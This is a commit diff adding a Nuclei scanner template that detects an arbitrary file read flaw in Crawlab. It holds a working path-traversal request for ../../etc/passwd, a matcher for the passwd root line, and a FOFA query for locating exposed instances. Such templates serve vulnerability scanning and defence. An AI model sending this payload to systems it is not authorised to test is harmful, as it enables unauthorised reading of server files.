Merge pull request #7878 from projectdiscovery/pussycat0x-patch-2
Crawlab File - Arbitrary File Readpatch-1
commit
09082d9a06
|
@ -0,0 +1,32 @@
|
|||
id: crawlab-lfi
|
||||
|
||||
info:
|
||||
name: Crawlab - Arbitrary File Read
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: title="Crawlab"
|
||||
tags: crawlab,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/file?path=../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "data\":\""
|
||||
- "error\":"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue